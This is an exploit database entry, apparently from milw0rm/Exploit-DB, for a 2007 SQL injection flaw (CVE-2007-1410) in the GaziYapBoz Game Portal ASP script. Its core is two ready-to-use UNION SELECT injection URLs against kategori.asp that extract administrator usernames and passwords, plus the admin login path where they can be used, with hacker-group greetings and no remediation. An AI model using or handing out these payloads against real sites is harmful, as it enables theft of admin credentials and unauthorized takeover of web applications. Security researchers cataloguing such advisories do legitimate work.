[] NeoSense

GaziYapBoz Game Portal - 'kategori.asp' SQL Injection

Author: CyberGhost
type: webapps
platform: asp
port: 
date_added: 2007-03-07 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-35600;CVE-2007-1410 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comgaziyapboz.zip

#Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# milw0rm.com [2007-03-08]